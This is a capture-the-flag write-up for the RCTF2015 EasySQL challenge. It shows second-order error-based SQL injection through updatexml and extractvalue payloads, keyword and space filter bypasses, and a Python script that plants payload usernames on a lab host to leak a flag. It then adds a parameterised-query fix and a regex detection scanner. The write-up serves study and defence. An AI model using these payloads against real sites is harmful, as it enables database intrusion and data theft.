[RCTF2015]EasySQL
First, poke at the site to find where errors surface.
Clicking the username shows the account details, and the password can be changed from there.
Changing the password reveals that the error message comes from the `user` lookup, so the SQL is guessed to be `select * from user where username=" " and pwd=' '`.
`or` is filtered; `||` can be used instead.
Spaces are filtered; `()` can be used instead.
A quick fuzz shows that both `updatexml` and `extractvalue` are usable.
So error-based injection is used here to build the payload.
- Error-based injection
Knowledge point: the ten kinds of MySQL error-based injection
- updatexml

Dump the database name:

```
j1a"||updatexml(1,concat(0x7e,(select(database())),0x7e),1)#
```

Dump the table names:

```
j1a"||updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)#
```

Dump the column names. The flag is not in the `flag` table, don't be fooled:

```
j1a"||updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1)#
```

Then read that column directly:

```
j1a"||updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users))),1)#
```

That does not turn up the flag.
- Regex search

```
j1a"||updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1)#
```

The result is incomplete (the error message is truncated).
- `right` and `left` are filtered, so use `reverse` to output the value backwards

```
j1a"||updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1)#
```

Then a script restores the order and the two pieces are spliced together:
```python
# The fragment leaked by the reverse() query, still backwards; flip it back.
# (Renamed from `list`, which shadows the built-in.)
tail = ":}c8d139b3f173-beeb-1f04-86c8-7d"
tail = tail[::-1]
print(tail)
# :flag{f5be28d7-8c68-40f1-beeb-37    <- forward fragment from the earlier query
# d7-8c68-40f1-beeb-371f3b931d8c}:    <- the reversed fragment printed above
# flag{f5be28d7-8c68-40f1-beeb-371f3b931d8c}   <- overlap the two and splice
```
All the requests together, plus the script (for study):
```python
import requests

url_reg = 'http://863dd33d-4fd1-4215-b5ad-c6c925288a91.node4.buuoj.cn:81/register.php'
url_log = 'http://863dd33d-4fd1-4215-b5ad-c6c925288a91.node4.buuoj.cn:81/login.php'
url_change = 'http://863dd33d-4fd1-4215-b5ad-c6c925288a91.node4.buuoj.cn:81/changepwd.php'

pre = 'j1a"'
tail = "'))),1))#"
s = 'abcdefghijklmnopqrstuvwxyz1234567890'  # candidate first characters for the regexp

r = requests.session()


def register(name):
    # The username carries the payload; it is stored here and only fires later.
    data = {
        'username': name,
        'password': '123',
        'email': '123',
    }
    r.post(url=url_reg, data=data)


def login(name):
    data = {
        'username': name,
        'password': '123',
    }
    r.post(url=url_log, data=data)


def changepwd():
    # changepwd.php builds its query from the stored username (second-order);
    # responses without 'target' are the error pages carrying the leaked string.
    data = {
        'oldpass': '',
        'newpass': '',
    }
    kk = r.post(url=url_change, data=data)
    if 'target' not in kk.text:
        print(kk.text)


for i in s:
    payload = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + tail
    register(payload)
    login(payload)
    changepwd()
```
This tries every starting character in one pass to locate the row holding the flag.
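The script above stores the payload as a username at registration and only fires it on the password-change request, i.e. the injection is second-order: register.php keeps the string as data, and changepwd.php later splices it into SQL text. The block below is an added example, not the challenge's code, showing that pattern next to its parameterised fix. Everything in it is a constructed stand-in: an in-memory SQLite table with the guessed columns `username`/`pwd`, a hypothetical `change_pwd_unsafe`/`change_pwd_safe` pair, and a single-quoted `username` comparison (the challenge's query is guessed to use double quotes). SQLite has no `updatexml()`, so on the unsafe path the injected text surfaces as a parse error instead of a leaked value, but the root cause is identical: attacker-controlled data reaches the SQL parser.

```python
import sqlite3

# Constructed demo value: the writeup's database-name payload, adapted to the
# single-quoted username used in this stand-in schema.
PAYLOAD_USER = "j1a'||(updatexml(1,concat(0x7e,(select(database())),0x7e),1))#"


def make_db():
    """In-memory stand-in for the challenge's guessed users(username, pwd) table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    # register.php stores the username with bound parameters: nothing goes wrong yet.
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "secret"), (PAYLOAD_USER, "123")])
    db.commit()
    return db


def change_pwd_unsafe(db, username, old_pwd, new_pwd):
    """Hypothetical changepwd.php: the stored username is spliced into SQL text."""
    sql = ("UPDATE users SET pwd='" + new_pwd + "' WHERE username='" + username
           + "' AND pwd='" + old_pwd + "'")
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount


def change_pwd_safe(db, username, old_pwd, new_pwd):
    """Same operation with bound parameters: the username is a value, never SQL."""
    cur = db.execute("UPDATE users SET pwd=? WHERE username=? AND pwd=?",
                     (new_pwd, username, old_pwd))
    db.commit()
    return cur.rowcount


def demo():
    db = make_db()
    results = {}
    # A benign username behaves the same on both paths.
    results["unsafe_alice"] = change_pwd_unsafe(db, "alice", "secret", "new1")
    # The stored payload reaches the SQL parser on the unsafe path (second-order).
    try:
        change_pwd_unsafe(db, PAYLOAD_USER, "123", "new2")
        results["unsafe_payload"] = "executed"
    except sqlite3.OperationalError:
        results["unsafe_payload"] = "rejected by parser"
    # On the parameterised path the same username is an ordinary value; the row updates.
    results["safe_payload"] = change_pwd_safe(db, PAYLOAD_USER, "123", "new2")
    results["stored_pwd"] = db.execute("SELECT pwd FROM users WHERE username=?",
                                       (PAYLOAD_USER,)).fetchone()[0]
    return results


if __name__ == "__main__":
    print(demo())
```

The point to take away is that the filters in the challenge (`or`, spaces, `left`/`right`) sat on the wrong layer: the parameterised `UPDATE` needs no filtering at all, and the unsafe one cannot be made safe by blocklisting keywords.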
- extractvalue

```
j1a"||(extractvalue(1,concat(0x7e,(select(database())),0x7e)));#
j1a"||(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)));#
j1a"||(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),0x7e)));#
j1a"||(extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where((real_flag_1s_here)regexp('^f'))),0x7e)));#
j1a"||(extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where((real_flag_1s_here)regexp('^f')))),0x7e)));#
```
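The payloads above dodge the challenge's filters by swapping `or` for `||`, spaces for parentheses, and `left`/`right` for `reverse`, which is exactly why keyword blocklists fail. As an added example that is not part of the writeup, the block below shows what server-side detection can still key on once the request is URL-decoded: the `updatexml`/`extractvalue` error channel, `information_schema` enumeration, keywords glued to `(` in place of a space, the `||(` form, and a trailing SQL comment. The log lines are constructed (URL-encoded copies of this page's payloads in a made-up `<client> <method> <path> <field>=<value>` format), and `RULES` and `scan` are hypothetical names.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the error-based injection primitives used in this writeup.
# Rule names are hypothetical; input is URL-decoded and lower-cased before matching.
RULES = {
    "xml_error_function": re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "schema_enumeration": re.compile(r"information_schema\.(tables|columns)"),
    "or_keyword_bypass": re.compile(r"\|\|\s*\("),          # `||(` standing in for a filtered `or`
    "space_bypass": re.compile(r"\b(select|from|where)\("),  # keyword glued to `(` instead of a space
    "truncation_workaround": re.compile(r"\b(reverse|right|left)\s*\(\s*\(?\s*select\b"),
    "sql_comment_tail": re.compile(r"(#|--\s)\s*$"),
}

# Constructed sample log lines (not from the challenge server). Format:
# "<client> <method> <path> <field>=<value>", value URL-encoded as a browser sends it.
SAMPLE_LOG = [
    "10.0.0.5 POST /register.php username=alice",
    "10.0.0.5 POST /register.php username=j1a%22%7C%7Cupdatexml(1,concat(0x7e,(select(database())),0x7e),1)%23",
    "10.0.0.5 POST /register.php username=j1a%22%7C%7Cupdatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)%23",
    "10.0.0.5 POST /register.php username=j1a%22%7C%7C(extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where((real_flag_1s_here)regexp(%27%5Ef%27)))),0x7e)))%3B%23",
    "10.0.0.9 POST /login.php username=bob+smith",
]


def scan(lines):
    """Return {line_index: [rule names]} for every line that trips at least one rule."""
    hits = {}
    for i, line in enumerate(lines):
        decoded = unquote_plus(line).lower()
        matched = sorted(name for name, rx in RULES.items() if rx.search(decoded))
        if matched:
            hits[i] = matched
    return hits


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_LOG).items():
        print(idx, rules)
```

Decoding before matching matters: the same payload arrives as `%7C%7C` and `%23`, so a rule written against the raw line would miss `||` and `#`. Rules like these are a tripwire for the error-based technique, not a substitute for bound parameters and for keeping database error text out of HTTP responses.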